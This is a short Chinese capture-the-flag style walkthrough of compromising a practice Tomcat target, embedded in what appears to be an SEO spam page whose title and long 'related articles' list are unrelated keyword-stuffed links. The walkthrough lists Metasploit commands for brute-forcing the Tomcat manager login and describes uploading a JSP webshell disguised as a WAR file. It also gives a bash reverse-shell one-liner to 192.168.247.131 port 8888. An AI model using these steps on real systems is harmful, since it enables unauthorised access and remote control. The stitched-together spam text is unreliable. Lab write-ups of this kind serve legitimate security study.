当前位置: 首页 > wzjs >正文

沧州礼品行业网站设计搜索网站哪个好

沧州礼品行业网站设计,搜索网站哪个好,wordpress默认页面,wdcp网站打不开信息收集 将靶机改为net模式,开启kali进行扫描,得到靶机ip 对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理 进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口 查…

信息收集

将靶机改为net模式,开启kali进行扫描,得到靶机ip

对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理

进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口

查了一下,都是msf爆破【Web安全】kali渗透工具MSF以及msfconsole命令详解_kali msfconsole-CSDN博客

msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS (靶场ip)
run

登录上去后,可以找到部署war文件的位置,可以发现可以上传文件

我们将自己的jsp木马文件压缩成zip文件,然后把后缀改成war

访问木马文件,用哥斯拉连接

那么我们进行反弹shell,在kali开启监听,在虚拟终端输入命令进行反弹shell到kali上

bash -c 'bash -i>& /dev/tcp/192.168.247.131/8888 0>&1'

监听成功

http://www.dtcms.com/wzjs/10905.html

相关文章:

  • 合肥网站建设公互联网营销师怎么考
  • 动漫网站怎么做武威网站seo
  • 教育网站设计案例百度收录查询工具
  • 东莞招聘信息最新招聘2022百度seo新算法
  • 深圳做网站建设比较好的公司前端培训
  • 网站付款链接怎么做启动互联全网营销推广
  • 自建站网址推广营销网络
  • 宁波房产信息网官方网站win10系统优化软件
  • logo设计多少钱seo优化搜索推广
  • 怎么把个人做的网站上传到网上附近广告公司
  • 新手去哪个网站做翻译如何在百度投放广告
  • 简述建设一个网站的具体步骤自媒体平台排名前十
  • wordpress博客好吗seo排名软件
  • 天汇大厦网站建设公司百度账户安全中心
  • 服装公司网站网页设计亚马逊关键词排名提升
  • 虎门有没有做网站公司网页链接制作生成
  • 做网上任务赚钱的网站网址注册
  • 网站建设四个步骤泉州百度推广咨询
  • 阿里云做网站号码短视频推广
  • 建设政府网站多少钱国内十大软件培训机构
  • 新洲建设投标网站怎么推广网址
  • 香港旅游网站开发百度一下 你知道首页
  • 做网站怎么买服务器有广告位怎么找广告商
  • 宜昌网站推广优化技巧关键词优化精灵
  • 自学电脑做网站月入过万上海比较好的seo公司
  • 台州网站建设网站推广推广平台排名
  • 外网服务器优化设计答案
  • 手赚网站哪里可以做seo优化标题
  • 深圳营销型企业网站网络营销方式
  • 做百度网站分录公司做个网站多少钱